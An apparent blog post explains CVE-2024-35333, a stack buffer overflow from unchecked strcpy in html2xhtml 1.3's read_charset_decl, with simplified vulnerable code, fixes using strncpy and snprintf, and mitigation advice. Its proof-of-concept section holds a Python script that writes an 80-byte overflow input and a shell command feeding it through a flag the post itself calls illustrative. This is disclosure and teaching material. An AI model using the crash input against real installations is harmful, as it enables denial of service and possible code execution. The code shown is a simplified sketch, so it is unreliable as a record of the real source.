CVE-2024-35333 - Stack Buffer Overflow in `read_charset_decl` of html2xhtml 1.3 – Explained with Exploit Example

---

Overview

CVE-2024-35333 is a newly discovered vulnerability affecting html2xhtml 1.3, an open-source tool for converting HTML documents into XHTML. This vulnerability is a stack buffer overflow in the function read_charset_decl, caused by improper bounds checking. Attackers can exploit this by supplying a specially crafted input, leading to denial of service, data corruption, or even arbitrary code execution.

This post will cover how the vulnerability works, provide some code examples, walk through a sample exploit, and link to important references.

What is html2xhtml?

html2xhtml is a command-line utility that parses HTML files and converts them into well-formed XHTML. Written in C, it's often used in automated web processing pipelines and data conversion tools.

The Vulnerable Code: read_charset_decl

The vulnerability is located in the read_charset_decl function. Here’s a simplified version of the function illustrating the issue:

#include <string.h>

void read_charset_decl(const char *input) {
    char buf[64];  // Fixed-size buffer on the stack
    // Vulnerable: strcpy copies until the null terminator, with no check against sizeof(buf).
    strcpy(buf, input);
    // ... Further processing
}

How Does the Exploit Work?

An attacker can provide an input of 64 or more characters, so that the string plus its terminating null byte no longer fits in the 64-byte buf. strcpy performs no length check: it copies every byte, writes past the end of buf, and corrupts adjacent data on the stack, which may include the saved return address.
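To make the arithmetic concrete, here is a minimal sketch that computes how many bytes strcpy would write past the end of a fixed-size buffer. The helper name overrun_bytes is hypothetical and is not part of html2xhtml; the 64-byte size used in the note below matches the simplified buf shown earlier.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Hypothetical helper (not part of html2xhtml): returns how many bytes
 * strcpy(buf, input) would write beyond a buffer of buf_size bytes.
 * strcpy writes strlen(input) characters plus one terminating null byte. */
size_t overrun_bytes(const char *input, size_t buf_size) {
    assert(input != NULL);
    size_t needed = strlen(input) + 1;  /* characters + null terminator */
    return needed > buf_size ? needed - buf_size : 0;
}
```

With a 64-byte buffer, a 63-character string fits exactly (0 bytes of overrun), a 64-character string overruns by 1 byte (the terminator), and an 80-character string overruns by 17 bytes.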

Step-By-Step Exploit (Proof-of-Concept)

Let’s walk through how a malicious user might exploit this vulnerability.

1. Crafting the Malicious Input

Suppose an attacker prepares an input string that is 80 bytes long.

# Python code to create the payload
payload = b"A" * 80  # 80 bytes, all 'A'
with open("exploit.txt", "wb") as f:
    f.write(payload)

2. Feeding Input to the Program

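Assume, for illustration, that html2xhtml accepts a charset through an argument or config file whose value reaches read_charset_decl. The --charset flag below is illustrative and may not match the tool's real command-line options. The attacker passes the contents of "exploit.txt" using shell command substitution:

html2xhtml --charset "$(cat exploit.txt)" input.html output.html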

How to Fix

The correct way to eliminate this vulnerability is to use a safe string copy that checks boundaries, like strncpy or, better yet, snprintf, and to ensure the buffer is always null-terminated.

Vulnerable

strcpy(buf, input);

Fixed

strncpy(buf, input, sizeof(buf) - 1);
buf[sizeof(buf) - 1] = '\0'; // guarantee null-termination
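
Because strncpy truncates silently, a caller cannot tell a valid charset name from a cut-off one. As a minimal sketch of the snprintf alternative mentioned above, the hypothetical helper copy_charset (not taken from the html2xhtml source) performs a bounded copy and reports truncation so the caller can reject oversized input.

```c
#include <assert.h>
#include <stddef.h>
#include <stdio.h>

/* Hypothetical helper (not from html2xhtml): bounded copy that reports truncation.
 * Returns 0 if src fit in dst, -1 if it was truncated or formatting failed.
 * dst is always null-terminated on return. */
int copy_charset(char *dst, size_t dst_size, const char *src) {
    assert(dst != NULL && src != NULL && dst_size > 0);
    /* snprintf writes at most dst_size bytes including the terminator and
     * returns the length the full string would have needed. */
    int n = snprintf(dst, dst_size, "%s", src);
    if (n < 0) {
        dst[0] = '\0';  /* formatting error: leave an empty string */
        return -1;
    }
    if ((size_t)n >= dst_size) {
        return -1;      /* input was truncated to fit */
    }
    return 0;
}
```

A caller would treat a return value of -1 as malformed input and stop processing rather than continue with a truncated charset name.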

References

- CVE-2024-35333 Record at NVD (pending)
- html2xhtml Project Page
- Common C Mistakes: Buffer Overflows (CWE-121)
- An Introduction to Stack Smashing Attacks

1. Do not use html2xhtml 1.3 with untrusted input.

2. Monitor the SourceForge project for patches.

Conclusion

CVE-2024-35333 is a classic yet dangerous stack buffer overflow caused by the unchecked use of strcpy in the read_charset_decl function. Vulnerabilities of this kind can let attackers crash a program or, in some cases, take control of it when user input is copied without a length check. Until a patch is released, use html2xhtml 1.3 only with trusted input, and always validate input lengths in C programs.

Timeline

Published on: 05/29/2024 16:15:11 UTC
Last modified on: 08/19/2024 16:35:15 UTC